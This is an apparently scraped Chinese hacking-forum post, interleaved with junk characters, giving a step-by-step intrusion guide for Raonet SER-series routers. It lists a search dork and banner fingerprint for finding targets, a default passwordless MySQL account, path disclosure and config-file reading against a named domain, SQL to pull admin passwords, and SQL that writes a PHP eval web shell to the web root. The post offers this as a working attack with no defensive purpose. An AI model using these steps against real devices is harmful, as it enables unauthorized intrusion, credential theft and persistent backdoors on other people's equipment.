寻找存在漏洞的路由器方法:
1 ^2 K/ T) M1 g* z9 [' T |2 n8 I" V1 \3 g e: U
1:google搜索'Raonet Subscriber Ethernet Router'
9 |# ?# [: k7 U2 y4 G( r# P& K2 s
9 h( u: ~. X; x) o2 {& h) i2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
' p; w! I# C, x
3 P' c0 C7 s+ ^/ N3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
0 M: L8 e* i1 ?
8 w( ~/ t9 @/ e0 V q) T1 P1 s3 w//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......, {" a; O9 \3 l2 _9 L/ @- k8 T
' M" O: p9 |7 m0 r( n
+ h6 _4 }5 n5 ? M7 \8 S2 ^2 e: e: t0 Z2 {% n
入侵步骤:7 y: \& B0 L, _/ s7 a# M! A( d8 u4 r
5 j1 z" |$ q7 C2 g
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
: A6 L. Q) e( v1 Q0 _8 a6 d! F, E( v5 n* X
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
1 |9 Y1 H4 R1 r7 X+ Y1 `( w0 {3:得到密码后连接,查看GUI管理密码:. C$ G7 l/ h1 B% m
use ser_5008 K/ n, D- \) a
select id,passwd from user;
7 D+ M9 ?% t( Z) |4:通过数据库写入webshell,执行命令:
0 _9 V$ ^ q. p( ~2 Fuse mysql;
/ H" y, S) I+ Acreate table ok(cmd TEXT);
& |+ v) F# e) D" `8 T5 n2 Qinsert into ok values("<?php @eval($_POST[cmd])?>");
+ w% p; ~" T$ u4 {' W2 [select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";% v6 [6 M5 [8 T6 W2 i% `1 d4 k$ G
drop table ok;1 z& B( M( _) H' X0 f4 v
; [% c9 B4 I$ i6 N5:连接后门shell.php
0 V, z7 n" a5 { c" K, v7 t( u. u0 w+ V
6. 搞定!' {; c( P# `. t# a) ]( M
% p$ t: Y5 ~9 E0 L7 k |